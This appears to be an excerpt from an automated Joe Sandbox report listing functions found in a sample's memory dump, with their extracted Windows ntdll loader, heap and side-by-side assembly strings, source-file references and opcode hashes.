                                                          Function 010A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          • Opcode ID: d07e209544990a6feb6244f06045e575e44633dc3ad8757324daed45e12dc58e
                                                          • Instruction ID: 0f37944a6b213c8097ab369cacbaee5216e94f0ce7ac815144fd9621f17b1a37
                                                          • Opcode Fuzzy Hash: d07e209544990a6feb6244f06045e575e44633dc3ad8757324daed45e12dc58e
                                                          • Instruction Fuzzy Hash: 54929071604342AFE725DFA8C880BABB7E8BB84754F44492DFAD4DB251D770E844CB92
                                                          Function 01058620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Critical section address, xrefs: 01095425, 010954BC, 01095534
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0109540A, 01095496, 01095519
                                                          • Thread identifier, xrefs: 0109553A
                                                          • 8, xrefs: 010952E3
                                                          • Address of the debug info found in the active list., xrefs: 010954AE, 010954FA
                                                          • corrupted critical section, xrefs: 010954C2
                                                          • Critical section address., xrefs: 01095502
                                                          • undeleted critical section in freed memory, xrefs: 0109542B
                                                          • Critical section debug info address, xrefs: 0109541F, 0109552E
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01095543
                                                          • double initialized or corrupted critical section, xrefs: 01095508
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010954CE
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010954E2
                                                          • Invalid debug info address of this critical section, xrefs: 010954B6
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          • Opcode ID: ce2b598a7226a1b5e0a5efb53ebc18ba78a930daf07d5981581c57827dac8131
                                                          • Instruction ID: 6acf01c462c07611f28d02c94d90823cf5eb87e9b81bc68c1c7506ee10d7aad7
                                                          • Opcode Fuzzy Hash: ce2b598a7226a1b5e0a5efb53ebc18ba78a930daf07d5981581c57827dac8131
                                                          • Instruction Fuzzy Hash: CF818E70A00349AFEF61CF9ACC51BAEBBF5BB48714F10805AF584BB291D775A940CB60
                                                          Function 010529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • @, xrefs: 0109259B
                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0109261F
                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010922E4
                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010924C0
                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01092506
                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01092498
                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01092409
                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010925EB
                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01092412
                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01092602
                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01092624
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                          • API String ID: 0-4009184096
                                                          • Opcode ID: 74f664b5a084485399af150c445b325546147e2439f7cc8b2d83e0818233e22d
                                                          • Instruction ID: 2a026b337fefd6a3f0da2bfbd41568e7fbe1326139ef79911391d80413cb9551
                                                          • Opcode Fuzzy Hash: 74f664b5a084485399af150c445b325546147e2439f7cc8b2d83e0818233e22d
                                                          • Instruction Fuzzy Hash: 390262F1D002299BDF61DB54CC90BDEB7B8AF54304F4441DAEA89A7242DB70AE84CF59
                                                          Function 010C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          • Opcode ID: 6ec33f9114063e443b85cb02dba9fcc157d8398621954a1863de6fec96b709f7
                                                          • Instruction ID: 6daf6dd4d848607f47a46c065e4279d9356f2ccb555071e455425b565e5044d9
                                                          • Opcode Fuzzy Hash: 6ec33f9114063e443b85cb02dba9fcc157d8398621954a1863de6fec96b709f7
                                                          • Instruction Fuzzy Hash: 7A51E0711183099BC325EF188888BAFBBECEF94B50F14891EEAD9C3251E770D504CB96
                                                          Function 010D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          • Opcode ID: 308dd5c70872d608b28b1c8ef77f584937f4973faeecd437c9270b94dc304b91
                                                          • Instruction ID: c62e051e68cabfcc2e66917dcf7b7a1ffd0cc6b093b3adf73b0a1eff7970f779
                                                          • Opcode Fuzzy Hash: 308dd5c70872d608b28b1c8ef77f584937f4973faeecd437c9270b94dc304b91
                                                          • Instruction Fuzzy Hash: 56D1CE35600786DFDB66DF68C440AAEBBF1FF49B10F088099F5899B65ACB34D981CB14
                                                          Function 010A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 010A8A67
                                                          • HandleTraces, xrefs: 010A8C8F
                                                          • VerifierDebug, xrefs: 010A8CA5
                                                          • VerifierDlls, xrefs: 010A8CBD
                                                          • AVRF: -*- final list of providers -*- , xrefs: 010A8B8F
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 010A8A3D
                                                          • VerifierFlags, xrefs: 010A8C50
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          • Opcode ID: 593376ef249fb252cf44d46139090ef908b563de68aadad5a3ba2f70501bfeee
                                                          • Instruction ID: 4228e1d9e695b8da6c2fce9ac2b7500597de34ec919fc0051b4616958f82e030
                                                          • Opcode Fuzzy Hash: 593376ef249fb252cf44d46139090ef908b563de68aadad5a3ba2f70501bfeee
                                                          • Instruction Fuzzy Hash: E2917972604306EFD725EFA8C980B9BBBE5EB95710F80846AFAC16F241C7709C40CB91
                                                          Function 0102EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                          • API String ID: 0-1109411897
                                                          • Opcode ID: 273683f5d1070ca1424b241e96c1124f3980f303ebf546235e92cb1b8308b516
                                                          • Instruction ID: fcf424754b34d4c4fc994ac7fe75cadbce2e7354ab3fc743d2a4eb5f7cedbace
                                                          • Opcode Fuzzy Hash: 273683f5d1070ca1424b241e96c1124f3980f303ebf546235e92cb1b8308b516
                                                          • Instruction Fuzzy Hash: 77A22874A0962A8FDB64DF18C8987ADBBB5BF45344F2442E9D98DE7250DB309E85CF00
                                                          Function 010563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          • Opcode ID: d470c5119b65d80b9e9daf2b74eb86cbbf7e394aa14abd9bbdc71c038b428ac3
                                                          • Instruction ID: fddf51611a7c09f3c102af12e8159c92806b2b47ecae4c4093efb7cf921a8c5d
                                                          • Opcode Fuzzy Hash: d470c5119b65d80b9e9daf2b74eb86cbbf7e394aa14abd9bbdc71c038b428ac3
                                                          • Instruction Fuzzy Hash: 26918C70B003159BEF79DF14DA54BAE7BA1FF41724F8001A8E9D0AB284DBB19842DB91
                                                          Function 0101645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01079A2A
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010799ED
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01079A11, 01079A3A
                                                          • LdrpInitShimEngine, xrefs: 010799F4, 01079A07, 01079A30
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01079A01
                                                          • apphelp.dll, xrefs: 01016496
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-204845295
                                                          • Opcode ID: 94f890ab5cf90f95f00fdc2c8d415609e482d956bd7cd9871a78e9f9e0bc6a51
                                                          • Instruction ID: cc601ac3db208a60620891cd41d9c07ce45aa10a3a010352511b62405e24b353
                                                          • Opcode Fuzzy Hash: 94f890ab5cf90f95f00fdc2c8d415609e482d956bd7cd9871a78e9f9e0bc6a51
                                                          • Instruction Fuzzy Hash: 7E510F71618305AFE725EF24C881AABB7E8FB84758F00092DF5D59B1A4DB70E944CB92
                                                          Function 01052674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01092178
                                                          • RtlGetAssemblyStorageRoot, xrefs: 01092160, 0109219A, 010921BA
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010921BF
                                                          • SXS: %s() passed the empty activation context, xrefs: 01092165
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01092180
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0109219F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          • Opcode ID: cb7068e8e927111323006f3a58dd086ef76939e551b5adafedd0fad833985f9d
                                                          • Instruction ID: 80da25456239a5b40581b9af7dacdd030bc5e37c3df0024d67f4f00e31d44930
                                                          • Opcode Fuzzy Hash: cb7068e8e927111323006f3a58dd086ef76939e551b5adafedd0fad833985f9d
                                                          • Instruction Fuzzy Hash: 5431E97AB40215B7FB21CA998C91FAF7AB8EF65A50F050059BBC46B140D370AA00D7A1
                                                          Function 0105C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Loading import redirection DLL: '%wZ', xrefs: 01098170
                                                          • LdrpInitializeProcess, xrefs: 0105C6C4
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0105C6C3
                                                          • LdrpInitializeImportRedirection, xrefs: 01098177, 010981EB
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 010981E5
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01098181, 010981F5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          • Opcode ID: 9182038a1888ffb0766a771ead0786fecf3d07708b1f1bc38f5dd523d069d152
                                                          • Instruction ID: d2a3e832001b1fb5c623377a780bded601bdc28c243668ba81ccf91dce0ee9d8
                                                          • Opcode Fuzzy Hash: 9182038a1888ffb0766a771ead0786fecf3d07708b1f1bc38f5dd523d069d152
                                                          • Instruction Fuzzy Hash: 623104B17483069FE325EF28D985E5BB7D8BF95B10F040568F9C1AB291E660ED04C7A2
                                                          Function 0106096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 01062DF0: LdrInitializeThunk.NTDLL ref: 01062DFA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060BA3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060BB6
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060D60
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060D74
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                          • String ID:
                                                          • API String ID: 1404860816-0
                                                          • Opcode ID: d48052e85a0511cada68d78912db345c5e574eed6e472e883360e5e0b25c9634
                                                          • Instruction ID: 5dc602067a89ee12ac20e1f264fce05e765758122a6d264e99d697351aef2432
                                                          • Opcode Fuzzy Hash: d48052e85a0511cada68d78912db345c5e574eed6e472e883360e5e0b25c9634
                                                          • Instruction Fuzzy Hash: 45425C71900715DFDB61CF28C890BAAB7F9FF44314F1485AAE989DB245E770AA84CF60
                                                          Function 0102A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          • Opcode ID: acd8180e9f0096dd2b1f270552f9ecb8458186849ad490e62968444db8656f55
                                                          • Instruction ID: f1773ca90daaebbcfd4b5f1ac4585613f2969c4da4c9a93e28062b7af949e1f3
                                                          • Opcode Fuzzy Hash: acd8180e9f0096dd2b1f270552f9ecb8458186849ad490e62968444db8656f55
                                                          • Instruction Fuzzy Hash: 79C1BD702083A6CFD721DF58C144B6AB7E4FF88704F0449AAF9D58BA51EB34DA49CB52
                                                          Function 01058402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • @, xrefs: 01058591
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01058421
                                                          • LdrpInitializeProcess, xrefs: 01058422
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0105855E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          • Opcode ID: 06c23dfbd2e81c64be1e2cce19477239c79694c0e3ec1734ad73442366cda19f
                                                          • Instruction ID: 19af855539d778a8a874c4413f6137903bb4cf533c6252887f4b19697b3f23e1
                                                          • Opcode Fuzzy Hash: 06c23dfbd2e81c64be1e2cce19477239c79694c0e3ec1734ad73442366cda19f
                                                          • Instruction Fuzzy Hash: B9917871508345AFDB62DE66CC40EABBAECFF88784F40492EFEC492151E735D9448B62
                                                          Function 0105273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • .Local, xrefs: 010528D8
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010921D9, 010922B1
                                                          • SXS: %s() passed the empty activation context, xrefs: 010921DE
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010922B6
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          • Opcode ID: 2c471c9867479f96ea178f874fe22f5797c93caec545ce304e8485432df2bc10
                                                          • Instruction ID: f9b2520b91b699b28e6d9394d68b042b424d7558e759957ecb1fe79bf727c358
                                                          • Opcode Fuzzy Hash: 2c471c9867479f96ea178f874fe22f5797c93caec545ce304e8485432df2bc10
                                                          • Instruction Fuzzy Hash: E6A1A03590022AEBDF65CF58D884BAAB7B4BF58314F1541E9DD88AB351D7309E80CF90
                                                          Function 010264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01081028
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01080FE5
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0108106B
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010810AE
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          • Opcode ID: a4880c418014f42315f8bde5de41423dfb97cd0a6252a17a8d1c98809f40b13c
                                                          • Instruction ID: 28cfc9e5c18e4d708e589fcec3ff5857b3fb2ea0bc9253d61d878f8475a5e5eb
                                                          • Opcode Fuzzy Hash: a4880c418014f42315f8bde5de41423dfb97cd0a6252a17a8d1c98809f40b13c
                                                          • Instruction Fuzzy Hash: 6E71F1B19083259FDB61EF14C884B9B7BE8AF95764F4044A8FDC88B14AD335D188CBD1
                                                          Function 0104245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpDynamicShimModule, xrefs: 0108A998
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0108A992
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0108A9A2
                                                          • apphelp.dll, xrefs: 01042462
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          • Opcode ID: af336f111e9210b48bfa2a7f15195fe51632ac01e9019441f557326fee1dc405
                                                          • Instruction ID: 6194593f0079141d49e92e6539a5ad7363f2d1bc370fa40c18f3ddaeef497f1b
                                                          • Opcode Fuzzy Hash: af336f111e9210b48bfa2a7f15195fe51632ac01e9019441f557326fee1dc405
                                                          • Instruction Fuzzy Hash: D7314875714201EBDB39AF59D980AAAFBF4FB84710F1600BAF9E067648C7B05881C740
                                                          Function 010329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0103327D
                                                          • HEAP[%wZ]: , xrefs: 01033255
                                                          • HEAP: , xrefs: 01033264
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          • Opcode ID: 5272e056d617abe72a7078502fefff9a2bd5fea24484e950caca216cd0acabd5
                                                          • Instruction ID: 51b7c465c2383d66cf5efe61b7530ef635183add7ab409be0e79154d852f701b
                                                          • Opcode Fuzzy Hash: 5272e056d617abe72a7078502fefff9a2bd5fea24484e950caca216cd0acabd5
                                                          • Instruction Fuzzy Hash: 4C92CE70A04249DFDB65CF68C4847AEBBF5FF88300F1884A9E995AB391D735A941CF50
                                                          Function 01030770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          • Opcode ID: 2ac87e4a21756ef9783842eecb550936372ee867e08241027b64c16e295a2a9c
                                                          • Instruction ID: e725e8ca8bbc537395227b0832a837e63d63622e780883f9a915101c737db3f6
                                                          • Opcode Fuzzy Hash: 2ac87e4a21756ef9783842eecb550936372ee867e08241027b64c16e295a2a9c
                                                          • Instruction Fuzzy Hash: 8EF1CE30605606DFEB25DF68C884BAEB7F9FF85304F1481A9E4969B385D734E981CB90
                                                          Function 01046962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
